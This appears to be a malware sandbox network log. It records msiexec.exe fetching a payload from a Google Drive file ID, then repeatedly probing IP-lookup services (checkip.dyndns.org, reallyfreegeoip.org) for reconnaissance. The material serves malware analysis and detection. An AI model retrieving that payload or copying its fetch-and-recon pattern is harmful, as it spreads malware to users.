Dec 19, 2024 10:29:59.990268946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.990293026 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:30:00.339201927 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:00.458849907 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:00.459069967 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:00.459331036 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:00.578813076 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:10.553548098 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:10.557952881 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:10.677484035 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:12.636004925 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:12.683010101 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:13.076680899 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:13.076806068 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:13.076894999 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:13.078612089 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:13.078653097 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.294930935 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.295114040 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:14.306757927 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:14.306781054 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.307080030 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.313312054 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:14.355331898 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.735965967 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.736057997 CET	443	49713	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:14.736311913 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:14.741703987 CET	49713	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:14.748570919 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:14.868129015 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:18.070817947 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:18.073699951 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:18.073729992 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:18.073803902 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:18.074166059 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:18.074177027 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:18.120568991 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.288165092 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:19.290183067 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:19.290203094 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:19.735986948 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:19.736077070 CET	443	49714	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:19.736192942 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:19.736618042 CET	49714	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:19.740487099 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.741780996 CET	49715	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.860515118 CET	80	49712	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:19.860629082 CET	49712	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.861330032 CET	80	49715	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:19.861428022 CET	49715	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.861551046 CET	49715	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:19.981082916 CET	80	49715	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:22.002549887 CET	80	49715	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:22.003803968 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:22.003844023 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:22.003978014 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:22.004229069 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:22.004239082 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:22.058135986 CET	49715	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:23.443989038 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:23.445997953 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:23.446026087 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:23.921958923 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:23.922025919 CET	443	49716	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:23.922108889 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:23.922472000 CET	49716	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:23.926325083 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:24.045901060 CET	80	49717	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:24.046000004 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:24.046113968 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:24.165529013 CET	80	49717	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:25.277853966 CET	80	49717	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:25.294137955 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:25.294178009 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:25.294281006 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:25.298285007 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:25.298301935 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:25.323761940 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:26.511567116 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:26.515305996 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:26.515331984 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:26.956480980 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:26.956582069 CET	443	49718	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:26.956640005 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:26.957130909 CET	49718	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:26.960092068 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:26.961108923 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:27.080092907 CET	80	49717	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:27.080338955 CET	49717	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:27.080765963 CET	80	49719	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:27.080852032 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:27.080959082 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:27.200460911 CET	80	49719	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:28.285836935 CET	80	49719	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:28.287733078 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:28.287781000 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:28.287878036 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:28.288116932 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:28.288132906 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:28.339425087 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:29.499017954 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:29.500808001 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:29.500854969 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:29.945461988 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:29.945578098 CET	443	49720	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:29.945739031 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:29.946021080 CET	49720	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:29.949208021 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:29.949717045 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:30.069111109 CET	80	49719	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:30.069180965 CET	49719	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:30.069272995 CET	80	49721	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:30.069341898 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:30.069462061 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:30.188950062 CET	80	49721	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:31.277839899 CET	80	49721	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:31.279125929 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:31.279182911 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:31.279267073 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:31.279515982 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:31.279529095 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:31.323801994 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:32.491707087 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:32.495426893 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:32.495469093 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:32.935615063 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:32.935689926 CET	443	49722	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:32.935739994 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:32.936249018 CET	49722	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:32.939934969 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:32.941293001 CET	49723	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:33.059772968 CET	80	49721	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:33.059833050 CET	49721	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:33.060697079 CET	80	49723	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:33.060769081 CET	49723	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:33.060902119 CET	49723	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:33.180449963 CET	80	49723	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:35.266050100 CET	80	49723	158.101.44.242	192.168.2.7
Dec 19, 2024 10:30:35.308254957 CET	49723	80	192.168.2.7	158.101.44.242
Dec 19, 2024 10:30:35.716638088 CET	49724	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:35.716702938 CET	443	49724	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:35.716778040 CET	49724	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:35.717034101 CET	49724	443	192.168.2.7	104.21.67.152
Dec 19, 2024 10:30:35.717048883 CET	443	49724	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:36.928704977 CET	443	49724	104.21.67.152	192.168.2.7
Dec 19, 2024 10:30:36.980082989 CET	49724	443	192.168.2.7	104.21.67.152

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 10:29:51.571507931 CET	54952	53	192.168.2.7	1.1.1.1
Dec 19, 2024 10:29:51.708719015 CET	53	54952	1.1.1.1	192.168.2.7
Dec 19, 2024 10:29:54.359323025 CET	51552	53	192.168.2.7	1.1.1.1
Dec 19, 2024 10:29:54.496831894 CET	53	51552	1.1.1.1	192.168.2.7
Dec 19, 2024 10:30:00.197053909 CET	63063	53	192.168.2.7	1.1.1.1
Dec 19, 2024 10:30:00.334423065 CET	53	63063	1.1.1.1	192.168.2.7
Dec 19, 2024 10:30:12.930883884 CET	58972	53	192.168.2.7	1.1.1.1
Dec 19, 2024 10:30:13.072887897 CET	53	58972	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 10:29:51.571507931 CET	192.168.2.7	1.1.1.1	0xe544	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:29:54.359323025 CET	192.168.2.7	1.1.1.1	0x7a67	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.197053909 CET	192.168.2.7	1.1.1.1	0xa477	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:12.930883884 CET	192.168.2.7	1.1.1.1	0x4eb6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 10:29:51.708719015 CET	1.1.1.1	192.168.2.7	0xe544	No error (0)	drive.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:29:54.496831894 CET	1.1.1.1	192.168.2.7	0x7a67	No error (0)	drive.usercontent.google.com		172.217.17.65	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:00.334423065 CET	1.1.1.1	192.168.2.7	0xa477	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:13.072887897 CET	1.1.1.1	192.168.2.7	0x4eb6	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:30:13.072887897 CET	1.1.1.1	192.168.2.7	0x4eb6	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49712	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:00.459331036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 10:30:10.553548098 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 000e98c36639fe3a44564502417c40bb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 19, 2024 10:30:10.557952881 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 10:30:12.636004925 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c0b4c9e5b8d7289dc0623324ab2c7bc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 19, 2024 10:30:14.748570919 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 10:30:18.070817947 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 138b0533b6123c754b7c07781a47467c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49715	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:19.861551046 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 10:30:22.002549887 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 566126b70061316e0ef9e5fdd429ef87 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49717	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:24.046113968 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 10:30:25.277853966 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3363e5792854bd1f6c6cc408cca9be23 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49719	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:27.080959082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 10:30:28.285836935 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f3a0d9fe7d1641173cf427d0ca7ae7f9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49721	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:30.069462061 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 10:30:31.277839899 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 670836a1c18f1bf86564a17f6136ccf2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49723	158.101.44.242	80	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:30:33.060902119 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 10:30:35.266050100 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 31c89f0301bfc03f8d397255cc7f2628 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49710	216.58.208.238	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:29:53 UTC	216	OUT	GET /uc?export=download&id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-19 09:29:54 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 19 Dec 2024 09:29:53 GMT Location: https://drive.usercontent.google.com/download?id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-IERNbu2l9Z7e_nVrekvK1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49711	172.217.17.65	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:29:56 UTC	258	OUT	GET /download?id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
